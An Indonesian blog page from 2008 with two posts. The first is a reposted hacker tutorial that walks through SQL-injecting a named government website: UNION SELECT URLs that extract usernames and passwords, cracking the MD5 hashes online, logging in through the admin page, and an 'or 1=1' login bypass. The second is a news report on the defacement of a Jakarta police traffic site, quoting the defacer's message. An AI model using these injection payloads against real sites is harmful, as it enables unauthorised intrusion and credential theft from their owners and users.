Selasa, 09 September 2008

SQL injection (lagi dan lagi) di situs pemerintah

SQL injection (lagi dan lagi) di situs pemerintah
Oleh tomahawk_underground
Published: September 9, 2008
Updated: September 9, 2008
Print

langsung aja....saya masuk ke situs http://www.bkkbn.go.id, kemudia ke URL http://www.bkkbn.go.id/article.php?cid=27

yup...yang paling gampang untuk memeriksa situs ini bisa diinjek atau tidak (tapi gk selamanya juga sih) ada lah dengan menghapus baris sebelah tanda = , kmudian diisi dengan tanda '.

jika ada pesan error, misalnya :
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in bla bla bla....

yaa tandanya calon2 isa diinject nih... (tapi gk selamanya bisa lhooo)

kemudian saya masukkin SQL injection seperti ini :

http://www.bkkbn.go.id/article.php?cid=27+UNION+SELECT+1,2,3,4+FROM+user+--

arti dari : 1,2,3,4 ini = coba2 aja...diurutin tuh satu2 dari angka 1,2,3,4,....... sampe nongol field nya
arti dari : user = nama table (nebak...)

nah..nongol deh field nya :


ada di field 3...(gitu deh...). terus selanjutnya ganti angka 3 tadi ama inject nya...saya merubahnya jadi bgini :


http://www.bkkbn.go.id/article.php?cid=27+UNION+SELECT+1,2,concat_ws(0x3a,user_name,user_password),4+FROM+user+--

angka 3 diganti jadi concat_ws(0x3a,user_name,user_password)
meminta username ama password (gitu deh...)



nah...password di enkrip kan tuh pake MD5, yaa tinggal di dekrip aja lah...yg gampang sih dekrip ke http://www.passcracking.com

udeh tuh dapet kan hasil dekrip nya...sekarang tinggal cari halaman admin loginnya . seperti biasa, rata-rata situs standart tuh menu adminnya terletak di folder admin, jadi bgini :

http://www.bkkbn.go.id/admin/index.php

naahh...masuk deh

selanjutnya tinggal masukin aja user ID ama password nya.

JREENGGG!!!! REBES!! masuk deh
ada yang sebagai administrator, ada yang sebagai penulis


sebenernya sih bisa juga masuk sebagai penulis pake inject

username : 1' or '1=1'/*
password : 1' or '1=1'/*

tapi hanya sebagai penulis, bukan administrator.

akhir kata saya mau mengucapkan terimakasih kepada :
# My Lord Allah SWT
# kampus tercinta IPB, khususnya jurusan teknik komputer, kan kuangkat nama kampus ku
# member jasakom, khususnya yg nongkrong di forum (pl4y312, pitaqh, aurel666, massmissile, kucing item, cruzen, t0m, sanca,mmm...siapa lagi yaa...byk bgt deh..maap yg gk kesebut, tapi luv u all )

special thanks to :
# Om PIRUS (makasih free email nya )
# th30nly (ngutang banyak ama lo nih ilmunya)
# JS member dgn ID "new-bee" (yg ikut kerjasama pas pagi-pagi, wekekeke...)
# Tique --> artikel ini special buat kamu, tanda permohonan maaf dari saya (daripada di deface, mending jadi artikel). sekalian buat membuktikan kalo saya bukan hacker, apalagi hacker autis.

salam

tomahawk[at]jasakom[dot]org

sumber www.jasakom.com

Diposting oleh di Tidak ada komentar:

Senin, 08 September 2008

TMC Polda Metro Jaya Dibobol!

Situs Traffic Management Center (TMC) Polda Metro Jaya dibobol dedemit maya alias cracker. Tampilan situs seketika berubah putih. Cracker meninggalkan beberapa baris pesan berbahasa Inggris.

Ketika dikunjungi detikINET, Selasa pagi (9/9/2008) sekitar jam 7.31 WIB, situs yang sejatinya berisi informasi situasi lalu lintas di ibukota Jakarta, kegiatan masyarakat, ataupun aksi demo di ibukota ini berubah 'wajah' menjadi putih.

Beberapa baris pesan dalam bahasa Inggris ditinggalkan cracker, salah satunya pernyataan bahwa polisi sebagai organisasi yang korup dari tahun 2005, 2006 dan 2007.

Tampaknya, aksi deface ini merupakan salah satu protes cracker terhadap aparat kepolisian di Indonesia. Ia (cracker-red) bahkan mengklaim telah menguasai semua situs milik Kepolisian RI.

Target serangan berikutnya juga disebutkan cracker dalam aksi deface ini. Dalam pesannya itu, cracker menyebutkan bahwa ia akan mengincar situs selebriti yang berambisi masuk ke ranah politik sebagai target berikutnya.

Berikut bunyi pesan yang ditinggalkan cracker:

Our indonesian police are

"The 3rd corrupt organization in 2005
The 2nd corrupt organization in 2006
The most corrupt organization on 2007"

where the justice will go?!!

Today all indonesian police websites are
OWNED!!

message to computer underground
- our next target are -

Indonesian selebrities which have willing to be part of politics
Have no experience in leading an "RT"
They wnat to lead a country??
What a joke!!

Where our country will go?!!

Help our country from this crisis!
by reborning the will of 1997/1998 reformation!


Sampai berita ini diturunkan, situs TMC Polda Metro Jaya yang beralamat di http://www.lantas.metro.polri.go.id masih belum diperbaiki.
sumber www.detik.com
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)